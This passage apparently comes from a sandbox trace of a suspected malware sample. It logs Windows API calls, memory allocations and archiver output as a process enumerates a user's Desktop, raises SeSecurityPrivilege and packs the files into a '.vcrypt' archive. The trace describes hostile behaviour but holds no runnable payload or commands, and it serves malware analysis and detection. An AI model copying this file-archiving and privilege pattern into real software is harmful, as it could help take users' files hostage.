0x8e7c48 [0071.596] FindNextFileW (in: hFindFile=0x8e7c48, lpFindFileData=0x5aee90 | out: lpFindFileData=0x5aee90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x780d560, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x780d560, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780ef8, dwReserved1=0xb, cFileName="..", cAlternateFileName="")) returned 1 [0071.596] FindNextFileW (in: hFindFile=0x8e7c48, lpFindFileData=0x5aee90 | out: lpFindFileData=0x5aee90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x780ef8, dwReserved1=0xb, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.596] malloc (_Size=0x18) returned 0x7800c0 [0071.596] free (_Block=0x780ae0) [0071.597] malloc (_Size=0x18) returned 0x7801c0 [0071.597] malloc (_Size=0xc) returned 0xb5f410 [0071.597] malloc (_Size=0x18) returned 0x780220 [0071.597] malloc (_Size=0x4) returned 0x780ae0 [0071.597] free (_Block=0x0) [0071.597] malloc (_Size=0x4) returned 0x780ad0 [0071.597] malloc (_Size=0xc) returned 0xb5f698 [0071.597] malloc (_Size=0x18) returned 0x780240 [0071.597] free (_Block=0x780240) [0071.597] free (_Block=0xb5f698) [0071.597] free (_Block=0x780ad0) [0071.597] malloc (_Size=0x8) returned 0x780ad0 [0071.597] malloc (_Size=0x18) returned 0x780240 [0071.597] free (_Block=0x780ad0) [0071.597] malloc (_Size=0x50) returned 0x780fb0 [0071.597] malloc (_Size=0x18) returned 0x780260 [0071.597] malloc (_Size=0x4) returned 0x780ad0 [0071.597] free (_Block=0x0) [0071.597] free (_Block=0x0) [0071.597] free (_Block=0x0) [0071.597] free (_Block=0x780240) [0071.597] free (_Block=0x780220) [0071.597] free (_Block=0xb5f410) [0071.598] free (_Block=0x780ae0) [0071.598] free (_Block=0x7801c0) [0071.598] free (_Block=0x7800c0) [0071.598] malloc (_Size=0x8) returned 0x780ae0 [0071.598] FindNextFileW (in: hFindFile=0x8e7c48, lpFindFileData=0x5aee90 | out: lpFindFileData=0x5aee90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x780ef8, dwReserved1=0x77c6e36c, cFileName="video_driver.exe", cAlternateFileName="VIDEO_~1.EXE")) returned 1 [0071.598] malloc (_Size=0x22) returned 0x787a40 [0071.598] free (_Block=0x780ae0) [0071.598] malloc (_Size=0x22) returned 0x787b00 [0071.598] malloc (_Size=0xc) returned 0xb5f410 [0071.598] malloc (_Size=0x22) returned 0x787b30 [0071.598] malloc (_Size=0x4) returned 0x780ae0 [0071.598] free (_Block=0x0) [0071.598] malloc (_Size=0x4) returned 0x780ab0 [0071.598] malloc (_Size=0xc) returned 0xb5f698 [0071.598] malloc (_Size=0x22) returned 0x787b60 [0071.599] free (_Block=0x787b60) [0071.599] free (_Block=0xb5f698) [0071.599] free (_Block=0x780ab0) [0071.599] malloc (_Size=0x8) returned 0x780ab0 [0071.599] malloc (_Size=0x22) returned 0x787b60 [0071.599] free (_Block=0x780ab0) [0071.599] malloc (_Size=0x50) returned 0x781090 [0071.599] malloc (_Size=0x22) returned 0x787b90 [0071.599] malloc (_Size=0x8) returned 0x780ab0 [0071.599] free (_Block=0x780ad0) [0071.599] free (_Block=0x0) [0071.599] free (_Block=0x0) [0071.599] free (_Block=0x787b60) [0071.599] free (_Block=0x787b30) [0071.599] free (_Block=0xb5f410) [0071.599] free (_Block=0x780ae0) [0071.599] free (_Block=0x787b00) [0071.599] free (_Block=0x787a40) [0071.600] malloc (_Size=0x8) returned 0x780ae0 [0071.600] FindNextFileW (in: hFindFile=0x8e7c48, lpFindFileData=0x5aee90 | out: lpFindFileData=0x5aee90*(dwFileAttributes=0x77c6e36c, ftCreationTime.dwLowDateTime=0x778f2917, ftCreationTime.dwHighDateTime=0x10, ftLastAccessTime.dwLowDateTime=0xb501b4, ftLastAccessTime.dwHighDateTime=0xb50000, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x31, nFileSizeHigh=0x380021, nFileSizeLow=0x6, dwReserved0=0x3c, dwReserved1=0x77c6e36c, cFileName="⥏瞏ZƔµ", cAlternateFileName="")) returned 0 [0071.600] GetLastError () returned 0x12 [0071.600] free (_Block=0x780ae0) [0071.600] free (_Block=0x781008) [0071.600] FindClose (in: hFindFile=0x8e7c48 | out: hFindFile=0x8e7c48) returned 1 [0071.600] free (_Block=0x0) [0071.600] malloc (_Size=0x34) returned 0x7812d0 [0071.600] free (_Block=0x787a70) [0071.600] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.601] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.601] malloc (_Size=0x4) returned 0x780ae0 [0071.601] malloc (_Size=0x10) returned 0xb5f410 [0071.601] free (_Block=0x780ae0) [0071.601] malloc (_Size=0x20) returned 0xb528a8 [0071.601] free (_Block=0xb5f410) [0071.602] fputs (in: _Str="2 files, 795083 bytes (777 KiB)", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.602] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.604] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.605] free (_Block=0xb528a8) [0071.605] malloc (_Size=0x8) returned 0x780ae0 [0071.605] malloc (_Size=0x4e) returned 0x781008 [0071.605] malloc (_Size=0x80) returned 0x7810e8 [0071.605] free (_Block=0x781008) [0071.605] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", lpFindFileData=0x5aef68 | out: lpFindFileData=0x5aef68*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x780d560, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x780d560, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5aefd8, dwReserved1=0x8e7c88, cFileName="Desktop", cAlternateFileName="")) returned 0x8e7c48 [0071.606] malloc (_Size=0x10) returned 0xb5f410 [0071.606] free (_Block=0x780ae0) [0071.606] FindClose (in: hFindFile=0x8e7c48 | out: hFindFile=0x8e7c48) returned 1 [0071.606] free (_Block=0x7810e8) [0071.606] free (_Block=0xb5f410) [0071.606] malloc (_Size=0x8) returned 0x780ae0 [0071.606] malloc (_Size=0x8) returned 0x780ad0 [0071.606] malloc (_Size=0x84) returned 0x7810e8 [0071.606] free (_Block=0xb5d7b8) [0071.607] malloc (_Size=0x3e) returned 0x783348 [0071.607] free (_Block=0xb5d7c8) [0071.607] malloc (_Size=0x48) returned 0x781008 [0071.607] free (_Block=0xb5d7d8) [0071.607] malloc (_Size=0x3e) returned 0x783390 [0071.607] free (_Block=0xb5d808) [0071.607] free (_Block=0x0) [0071.607] malloc (_Size=0xa0) returned 0x781178 [0071.607] malloc (_Size=0x8) returned 0xb5d808 [0071.607] malloc (_Size=0x8) returned 0xb5d7d8 [0071.607] malloc (_Size=0x8) returned 0xb5d7c8 [0071.607] malloc (_Size=0x8) returned 0xb5d7b8 [0071.607] malloc (_Size=0x22) returned 0x787a70 [0071.607] free (_Block=0xb5d808) [0071.607] malloc (_Size=0x22) returned 0x787a40 [0071.607] free (_Block=0xb5d7d8) [0071.607] malloc (_Size=0x8) returned 0xb5d7d8 [0071.607] malloc (_Size=0x22) returned 0x787b00 [0071.607] free (_Block=0xb5d7d8) [0071.607] malloc (_Size=0xc) returned 0xb5f410 [0071.607] malloc (_Size=0x22) returned 0x787b30 [0071.607] malloc (_Size=0x4) returned 0xb5d7d8 [0071.607] free (_Block=0x0) [0071.608] free (_Block=0x787b00) [0071.608] malloc (_Size=0x22) returned 0x787b00 [0071.608] free (_Block=0xb5d7b8) [0071.608] malloc (_Size=0x30) returned 0x781058 [0071.608] malloc (_Size=0x22) returned 0x787b60 [0071.608] free (_Block=0x787b00) [0071.608] malloc (_Size=0x8) returned 0xb5d7b8 [0071.608] free (_Block=0x787b30) [0071.608] free (_Block=0xb5f410) [0071.608] malloc (_Size=0x8) returned 0xb5d808 [0071.608] malloc (_Size=0x14) returned 0x7800c0 [0071.608] free (_Block=0xb5d808) [0071.608] malloc (_Size=0xc) returned 0xb5f410 [0071.608] malloc (_Size=0x14) returned 0x7801c0 [0071.608] free (_Block=0x7800c0) [0071.608] malloc (_Size=0x14) returned 0x7800c0 [0071.608] free (_Block=0xb5d7b8) [0071.608] malloc (_Size=0x30) returned 0x780de0 [0071.608] malloc (_Size=0x14) returned 0x780220 [0071.609] free (_Block=0x7800c0) [0071.609] malloc (_Size=0x8) returned 0xb5d7b8 [0071.609] free (_Block=0x7801c0) [0071.609] free (_Block=0xb5f410) [0071.609] malloc (_Size=0x30) returned 0x781220 [0071.609] free (_Block=0x787a70) [0071.609] malloc (_Size=0x30) returned 0x7815c8 [0071.609] free (_Block=0x787a40) [0071.609] malloc (_Size=0x8) returned 0xb5d808 [0071.609] malloc (_Size=0x14) returned 0x7801c0 [0071.609] free (_Block=0xb5d808) [0071.609] malloc (_Size=0xc) returned 0xb5f410 [0071.609] malloc (_Size=0x14) returned 0x7800c0 [0071.609] malloc (_Size=0x1c) returned 0xb528a8 [0071.609] free (_Block=0x7801c0) [0071.609] malloc (_Size=0xc) returned 0xb5f698 [0071.609] malloc (_Size=0x1c) returned 0x788fb8 [0071.609] malloc (_Size=0x8) returned 0xb5d808 [0071.609] free (_Block=0xb5d7d8) [0071.609] free (_Block=0xb528a8) [0071.609] malloc (_Size=0x30) returned 0x781600 [0071.609] free (_Block=0xb5d7b8) [0071.609] malloc (_Size=0x30) returned 0x781638 [0071.610] malloc (_Size=0x30) returned 0x781670 [0071.610] free (_Block=0x781600) [0071.610] malloc (_Size=0x8) returned 0xb5d7b8 [0071.610] free (_Block=0x788fb8) [0071.610] free (_Block=0xb5f698) [0071.610] free (_Block=0x7800c0) [0071.610] free (_Block=0xb5f410) [0071.610] malloc (_Size=0x8) returned 0xb5d7d8 [0071.610] malloc (_Size=0x14) returned 0x7800c0 [0071.610] free (_Block=0xb5d7d8) [0071.610] malloc (_Size=0xc) returned 0xb5f410 [0071.610] malloc (_Size=0x14) returned 0x7801c0 [0071.610] malloc (_Size=0xc) returned 0xb5f698 [0071.610] malloc (_Size=0x10) returned 0xb5f668 [0071.610] free (_Block=0x7800c0) [0071.610] malloc (_Size=0x24) returned 0x787a40 [0071.610] free (_Block=0xb5d7b8) [0071.610] malloc (_Size=0x30) returned 0x781600 [0071.610] malloc (_Size=0x24) returned 0x787a70 [0071.610] free (_Block=0x787a40) [0071.610] malloc (_Size=0x8) returned 0xb5d7b8 [0071.610] free (_Block=0xb5f668) [0071.610] free (_Block=0xb5f698) [0071.611] free (_Block=0x7801c0) [0071.611] free (_Block=0xb5f410) [0071.611] malloc (_Size=0x8) returned 0xb5d7d8 [0071.611] malloc (_Size=0x22) returned 0x787a40 [0071.611] free (_Block=0xb5d7d8) [0071.611] malloc (_Size=0xc) returned 0xb5f410 [0071.611] malloc (_Size=0x22) returned 0x787b30 [0071.611] free (_Block=0x787a40) [0071.611] malloc (_Size=0x22) returned 0x787a40 [0071.611] free (_Block=0xb5d7b8) [0071.611] malloc (_Size=0x30) returned 0x7816a8 [0071.611] malloc (_Size=0x22) returned 0x787b00 [0071.611] free (_Block=0x787a40) [0071.611] malloc (_Size=0x8) returned 0xb5d7b8 [0071.611] free (_Block=0x787b30) [0071.611] free (_Block=0xb5f410) [0071.611] malloc (_Size=0x8) returned 0xb5d7d8 [0071.611] malloc (_Size=0x24) returned 0x787b30 [0071.611] free (_Block=0xb5d7d8) [0071.611] malloc (_Size=0xc) returned 0xb5f410 [0071.611] malloc (_Size=0x24) returned 0x787a40 [0071.611] free (_Block=0x787b30) [0071.611] malloc (_Size=0x24) returned 0x787b30 [0071.612] free (_Block=0xb5d7b8) [0071.612] malloc (_Size=0x30) returned 0x7816e0 [0071.612] malloc (_Size=0x24) returned 0x787bc0 [0071.612] free (_Block=0x787b30) [0071.612] malloc (_Size=0x8) returned 0xb5d7b8 [0071.612] free (_Block=0x787a40) [0071.612] free (_Block=0xb5f410) [0071.612] malloc (_Size=0x8) returned 0xb5d7d8 [0071.612] malloc (_Size=0x18) returned 0x7801c0 [0071.612] free (_Block=0xb5d7d8) [0071.612] malloc (_Size=0xc) returned 0xb5f410 [0071.612] malloc (_Size=0x18) returned 0x7800c0 [0071.612] free (_Block=0x7801c0) [0071.612] malloc (_Size=0x18) returned 0x7801c0 [0071.612] free (_Block=0xb5d7b8) [0071.612] malloc (_Size=0x30) returned 0x781718 [0071.612] malloc (_Size=0x18) returned 0x780240 [0071.612] free (_Block=0x7801c0) [0071.612] malloc (_Size=0x8) returned 0xb5d7b8 [0071.612] free (_Block=0x7800c0) [0071.612] free (_Block=0xb5f410) [0071.612] malloc (_Size=0x8) returned 0xb5d7d8 [0071.613] malloc (_Size=0x12) returned 0x7800c0 [0071.613] free (_Block=0xb5d7d8) [0071.613] malloc (_Size=0xc) returned 0xb5f410 [0071.613] malloc (_Size=0x12) returned 0x7801c0 [0071.613] free (_Block=0x7800c0) [0071.613] malloc (_Size=0x12) returned 0x7800c0 [0071.613] free (_Block=0xb5d7b8) [0071.613] malloc (_Size=0x30) returned 0x781750 [0071.613] malloc (_Size=0x12) returned 0x7802a0 [0071.613] free (_Block=0x7800c0) [0071.613] malloc (_Size=0x8) returned 0xb5d7b8 [0071.613] free (_Block=0x7801c0) [0071.613] free (_Block=0xb5f410) [0071.613] malloc (_Size=0x8) returned 0xb5d7d8 [0071.613] malloc (_Size=0x18) returned 0x7801c0 [0071.613] free (_Block=0xb5d7d8) [0071.613] malloc (_Size=0xc) returned 0xb5f410 [0071.613] malloc (_Size=0x18) returned 0x7800c0 [0071.613] free (_Block=0x7801c0) [0071.613] malloc (_Size=0x18) returned 0x7801c0 [0071.614] free (_Block=0xb5d7b8) [0071.614] malloc (_Size=0x30) returned 0x781788 [0071.614] malloc (_Size=0x18) returned 0x7802c0 [0071.614] free (_Block=0x7801c0) [0071.614] malloc (_Size=0x8) returned 0xb5d7b8 [0071.614] free (_Block=0x7800c0) [0071.614] free (_Block=0xb5f410) [0071.614] malloc (_Size=0x8) returned 0xb5d7d8 [0071.614] malloc (_Size=0x2a) returned 0x7817c0 [0071.614] free (_Block=0xb5d7d8) [0071.614] malloc (_Size=0xc) returned 0xb5f410 [0071.614] malloc (_Size=0x2a) returned 0x7817f8 [0071.614] free (_Block=0x7817c0) [0071.614] malloc (_Size=0x2a) returned 0x7817c0 [0071.614] free (_Block=0xb5d7b8) [0071.615] malloc (_Size=0x30) returned 0x781830 [0071.615] malloc (_Size=0x2a) returned 0x781868 [0071.615] free (_Block=0x7817c0) [0071.615] malloc (_Size=0x8) returned 0xb5d7b8 [0071.615] free (_Block=0x7817f8) [0071.615] free (_Block=0xb5f410) [0071.615] malloc (_Size=0x8) returned 0xb5d7d8 [0071.615] malloc (_Size=0x2c) returned 0x782548 [0071.615] free (_Block=0xb5d7d8) [0071.615] malloc (_Size=0xc) returned 0xb5f410 [0071.615] malloc (_Size=0x2c) returned 0x782580 [0071.615] free (_Block=0x782548) [0071.615] malloc (_Size=0x2c) returned 0x782548 [0071.615] free (_Block=0xb5d7b8) [0071.615] malloc (_Size=0x30) returned 0x7825b8 [0071.615] malloc (_Size=0x2c) returned 0x7825f0 [0071.615] free (_Block=0x782548) [0071.615] malloc (_Size=0x8) returned 0xb5d7b8 [0071.615] free (_Block=0x782580) [0071.615] free (_Block=0xb5f410) [0071.615] malloc (_Size=0x8) returned 0xb5d7d8 [0071.615] malloc (_Size=0x2a) returned 0x782580 [0071.615] free (_Block=0xb5d7d8) [0071.615] malloc (_Size=0xc) returned 0xb5f410 [0071.615] malloc (_Size=0x2a) returned 0x782548 [0071.616] free (_Block=0x782580) [0071.616] malloc (_Size=0x2a) returned 0x782580 [0071.616] free (_Block=0xb5d7b8) [0071.616] malloc (_Size=0x30) returned 0x782628 [0071.616] malloc (_Size=0x2a) returned 0x782660 [0071.616] free (_Block=0x782580) [0071.616] malloc (_Size=0x8) returned 0xb5d7b8 [0071.616] free (_Block=0x782548) [0071.616] free (_Block=0xb5f410) [0071.616] malloc (_Size=0x8) returned 0xb5d7d8 [0071.616] malloc (_Size=0x14) returned 0x7800c0 [0071.616] free (_Block=0xb5d7d8) [0071.616] malloc (_Size=0xc) returned 0xb5f410 [0071.616] malloc (_Size=0x14) returned 0x7801c0 [0071.616] free (_Block=0x7800c0) [0071.616] malloc (_Size=0x14) returned 0x7800c0 [0071.616] free (_Block=0xb5d7b8) [0071.616] malloc (_Size=0x30) returned 0x782548 [0071.616] malloc (_Size=0x14) returned 0x780280 [0071.616] free (_Block=0x7800c0) [0071.616] malloc (_Size=0x8) returned 0xb5d7b8 [0071.616] free (_Block=0x7801c0) [0071.616] free (_Block=0xb5f410) [0071.616] malloc (_Size=0x8) returned 0xb5d7d8 [0071.617] malloc (_Size=0x16) returned 0x7801c0 [0071.617] free (_Block=0xb5d7d8) [0071.617] malloc (_Size=0xc) returned 0xb5f410 [0071.617] malloc (_Size=0x16) returned 0x7800c0 [0071.617] free (_Block=0x7801c0) [0071.617] malloc (_Size=0x16) returned 0x7801c0 [0071.617] free (_Block=0xb5d7b8) [0071.617] malloc (_Size=0x30) returned 0x782580 [0071.617] malloc (_Size=0x16) returned 0x7802e0 [0071.617] free (_Block=0x7801c0) [0071.617] malloc (_Size=0x8) returned 0xb5d7b8 [0071.617] free (_Block=0x7800c0) [0071.617] free (_Block=0xb5f410) [0071.617] malloc (_Size=0x8) returned 0xb5d7d8 [0071.617] malloc (_Size=0x1e) returned 0xb528a8 [0071.617] free (_Block=0xb5d7d8) [0071.617] malloc (_Size=0xc) returned 0xb5f410 [0071.617] malloc (_Size=0x1e) returned 0x788fb8 [0071.617] free (_Block=0xb528a8) [0071.617] malloc (_Size=0x1e) returned 0xb528a8 [0071.617] free (_Block=0xb5d7b8) [0071.617] malloc (_Size=0x30) returned 0x782698 [0071.617] malloc (_Size=0x1e) returned 0xb52b00 [0071.617] free (_Block=0xb528a8) [0071.617] malloc (_Size=0x8) returned 0xb5d7b8 [0071.617] free (_Block=0x788fb8) [0071.617] free (_Block=0xb5f410) [0071.617] malloc (_Size=0x8) returned 0xb5d7d8 [0071.617] malloc (_Size=0x1c) returned 0xb528a8 [0071.618] free (_Block=0xb5d7d8) [0071.618] malloc (_Size=0xc) returned 0xb5f410 [0071.618] malloc (_Size=0x1c) returned 0x788fb8 [0071.618] free (_Block=0xb528a8) [0071.618] malloc (_Size=0x1c) returned 0xb528a8 [0071.618] free (_Block=0xb5d7b8) [0071.618] malloc (_Size=0x30) returned 0x7826d0 [0071.618] malloc (_Size=0x1c) returned 0x7817c0 [0071.618] free (_Block=0xb528a8) [0071.618] malloc (_Size=0x8) returned 0xb5d7b8 [0071.618] free (_Block=0x788fb8) [0071.618] free (_Block=0xb5f410) [0071.618] malloc (_Size=0x8) returned 0xb5d7d8 [0071.618] malloc (_Size=0x26) returned 0x787a40 [0071.618] free (_Block=0xb5d7d8) [0071.618] malloc (_Size=0xc) returned 0xb5f410 [0071.618] malloc (_Size=0x26) returned 0x787b30 [0071.618] free (_Block=0x787a40) [0071.618] malloc (_Size=0x26) returned 0x787a40 [0071.618] free (_Block=0xb5d7b8) [0071.618] malloc (_Size=0x30) returned 0x782708 [0071.618] malloc (_Size=0x26) returned 0x787bf0 [0071.618] free (_Block=0x787a40) [0071.618] malloc (_Size=0x8) returned 0xb5d7b8 [0071.618] free (_Block=0x787b30) [0071.618] free (_Block=0xb5f410) [0071.618] malloc (_Size=0x3e) returned 0x7833d8 [0071.618] free (_Block=0x781220) [0071.619] malloc (_Size=0x3e) returned 0x783420 [0071.619] free (_Block=0x7815c8) [0071.619] malloc (_Size=0x8) returned 0xb5d7d8 [0071.619] malloc (_Size=0x22) returned 0x787b30 [0071.619] free (_Block=0xb5d7d8) [0071.619] malloc (_Size=0xc) returned 0xb5f410 [0071.619] malloc (_Size=0x22) returned 0x787a40 [0071.619] malloc (_Size=0xc) returned 0xb5f698 [0071.619] malloc (_Size=0x1c) returned 0xb528a8 [0071.619] free (_Block=0x787b30) [0071.619] malloc (_Size=0x3e) returned 0x783468 [0071.619] free (_Block=0xb5d7b8) [0071.619] malloc (_Size=0x30) returned 0x782740 [0071.619] malloc (_Size=0x3e) returned 0x7834b0 [0071.619] free (_Block=0x783468) [0071.619] malloc (_Size=0x8) returned 0xb5d7b8 [0071.619] free (_Block=0xb528a8) [0071.619] free (_Block=0xb5f698) [0071.619] free (_Block=0x787a40) [0071.619] free (_Block=0xb5f410) [0071.619] malloc (_Size=0x8) returned 0xb5d7d8 [0071.619] malloc (_Size=0x22) returned 0x787a40 [0071.619] free (_Block=0xb5d7d8) [0071.619] malloc (_Size=0xc) returned 0xb5f410 [0071.619] malloc (_Size=0x22) returned 0x787b30 [0071.619] malloc (_Size=0xc) returned 0xb5f698 [0071.619] malloc (_Size=0x16) returned 0x7800c0 [0071.619] free (_Block=0x787a40) [0071.620] malloc (_Size=0x38) returned 0x7817e8 [0071.620] free (_Block=0xb5d7b8) [0071.620] malloc (_Size=0x30) returned 0x782778 [0071.620] malloc (_Size=0x38) returned 0x781220 [0071.620] free (_Block=0x7817e8) [0071.620] malloc (_Size=0x8) returned 0xb5d7b8 [0071.620] free (_Block=0x7800c0) [0071.620] free (_Block=0xb5f698) [0071.620] free (_Block=0x787b30) [0071.620] free (_Block=0xb5f410) [0071.620] malloc (_Size=0x8) returned 0xb5d7d8 [0071.620] malloc (_Size=0x22) returned 0x787b30 [0071.620] free (_Block=0xb5d7d8) [0071.620] malloc (_Size=0xc) returned 0xb5f410 [0071.620] malloc (_Size=0x22) returned 0x787a40 [0071.620] malloc (_Size=0xc) returned 0xb5f698 [0071.620] malloc (_Size=0x1c) returned 0xb528a8 [0071.620] free (_Block=0x787b30) [0071.620] malloc (_Size=0x3e) returned 0x783468 [0071.620] free (_Block=0xb5d7b8) [0071.620] malloc (_Size=0x30) returned 0x7827b0 [0071.620] malloc (_Size=0x3e) returned 0x7834f8 [0071.620] free (_Block=0x783468) [0071.620] malloc (_Size=0x8) returned 0xb5d7b8 [0071.620] free (_Block=0xb528a8) [0071.620] free (_Block=0xb5f698) [0071.621] free (_Block=0x787a40) [0071.621] free (_Block=0xb5f410) [0071.621] malloc (_Size=0x40) returned 0x783468 [0071.621] free (_Block=0x7833d8) [0071.621] malloc (_Size=0x40) returned 0x7833d8 [0071.621] free (_Block=0x783420) [0071.621] malloc (_Size=0x8) returned 0xb5d7d8 [0071.621] fputs (in: _Str="Updating archive: ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.622] fputs (in: _Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.623] free (_Block=0x7822c8) [0071.623] free (_Block=0x784c28) [0071.623] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.625] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.626] fputs (in: _Str="Keep old data in archive", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.729] fputs (in: _Str=": ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.730] fputs (in: _Str="4 folders, 34 files, 1992723 bytes (1947 KiB)", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.730] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.731] free (_Block=0x7833d8) [0071.731] malloc (_Size=0x4) returned 0xb5d7b8 [0071.731] malloc (_Size=0x10) returned 0xb5f3e0 [0071.731] free (_Block=0xb5d7b8) [0071.731] malloc (_Size=0x20) returned 0x784400 [0071.731] free (_Block=0xb5f3e0) [0071.731] fputs (in: _Str="Add new data to archive", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.732] fputs (in: _Str=": ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.732] fputs (in: _Str="2 files, 795083 bytes (777 KiB)", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.733] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.734] free (_Block=0x784400) [0071.734] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.735] malloc (_Size=0xb0) returned 0x784f50 [0071.735] malloc (_Size=0x8) returned 0xb5d7b8 [0071.735] malloc (_Size=0x8) returned 0xb5d7c8 [0071.735] GetCurrentProcess () returned 0xffffffff [0071.735] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x5af06c | out: TokenHandle=0x5af06c*=0xc4) returned 1 [0071.735] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x5af060 | out: lpLuid=0x5af060*(LowPart=0x8, HighPart=0)) returned 1 [0071.736] AdjustTokenPrivileges (in: TokenHandle=0xc4, DisableAllPrivileges=0, NewState=0x5af05c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0071.736] GetLastError () returned 0x0 [0071.736] CloseHandle (hObject=0xc4) returned 1 [0071.736] malloc (_Size=0x8) returned 0xb5d808 [0071.736] malloc (_Size=0x84) returned 0x785008 [0071.736] malloc (_Size=0x84) returned 0x785098 [0071.736] free (_Block=0x785008) [0071.736] malloc (_Size=0x8) returned 0xb5d7d8 [0071.736] malloc (_Size=0x84) returned 0x785008 [0071.736] free (_Block=0xb5d808) [0071.736] malloc (_Size=0x48) returned 0x7822c8 [0071.736] free (_Block=0xb5d7d8) [0071.736] free (_Block=0x7822c8) [0071.736] free (_Block=0x785098) [0071.736] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0071.737] free (_Block=0x785008) [0071.737] malloc (_Size=0x20) returned 0x784400 [0071.737] malloc (_Size=0x8) returned 0xb5d7d8 [0071.737] malloc (_Size=0x3e) returned 0x7833d8 [0071.737] malloc (_Size=0xe0) returned 0x785008 [0071.737] free (_Block=0x7833d8) [0071.737] malloc (_Size=0x8c) returned 0x7850f0 [0071.737] free (_Block=0x785008) [0071.737] malloc (_Size=0x8c) returned 0x785008 [0071.737] free (_Block=0xb5d7d8) [0071.737] free (_Block=0x7850f0) [0071.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\5p5nrgjn0js halpmcxz_desktop.vcrypt.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0071.737] malloc (_Size=0xc) returned 0xb5f3e0 [0071.738] malloc (_Size=0x8c) returned 0x7850a0 [0071.738] malloc (_Size=0x4) returned 0xb5d7d8 [0071.738] free (_Block=0x0) [0071.738] free (_Block=0x785008) [0071.738] malloc (_Size=0x14) returned 0x7801c0 [0071.738] malloc (_Size=0x6) returned 0xb5d808 [0071.738] malloc (_Size=0xc) returned 0xb5f410 [0071.738] malloc (_Size=0x6) returned 0xb5d7f8 [0071.738] malloc (_Size=0x4) returned 0xb5fc20 [0071.738] free (_Block=0x0) [0071.738] free (_Block=0xb5d808) [0071.738] malloc (_Size=0x4) returned 0xb5d808 [0071.738] free (_Block=0x0) [0071.738] GetCurrentProcess () returned 0xffffffff [0071.738] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x5aefb0, lpSystemAffinityMask=0x5aefb4 | out: lpProcessAffinityMask=0x5aefb0, lpSystemAffinityMask=0x5aefb4) returned 1 [0071.739] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0071.739] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusEx") returned 0x76d6d4c4 [0071.739] GlobalMemoryStatusEx (in: lpBuffer=0x5aef58 | out: lpBuffer=0x5aef58) returned 1 [0071.739] malloc (_Size=0x6) returned 0xb5fbf0 [0071.739] malloc (_Size=0x6) returned 0xb5fbd0 [0071.739] malloc (_Size=0x6) returned 0xb5fb90 [0071.739] free (_Block=0xb5fb90) [0071.739] free (_Block=0xb5fbd0) [0071.739] free 